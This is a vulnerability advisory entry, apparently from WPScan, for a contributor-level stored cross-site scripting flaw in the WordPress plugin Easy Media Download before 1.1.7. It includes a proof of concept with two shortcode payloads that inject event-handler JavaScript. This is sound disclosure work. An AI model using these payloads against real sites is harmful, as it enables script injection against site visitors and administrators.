How it works Pricing

Vulnerabilities

WordPress Plugins Themes Stats Submit vulnerabilities

For developers

Status API details CLI scanner

WordPress Plugin Vulnerabilities

Easy Media Download < 1.1.7 - Contributor+ Stored Cross-Site Scripting

Description

The plugin does not escape the text argument of its shortcode, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks.

Proof of Concept

Affected argument: url, text, target, rel and class

[easy_media_download url="/" text='" onerror="alert(/XSS/)//http']
[easy_media_download url="/" text="a" target='"autofocus onfocus=alert(/XSS/)//']

Affects Plugins

easy-media-download

Fixed in version 1.1.7

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

4f5c3f75-0501-4a1a-95ea-cbfd3fc96852

Timeline

Publicly Published

2021-09-22 (about 1 years ago)

Added

2021-09-22 (about 1 years ago)

Last Updated

2023-02-03 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin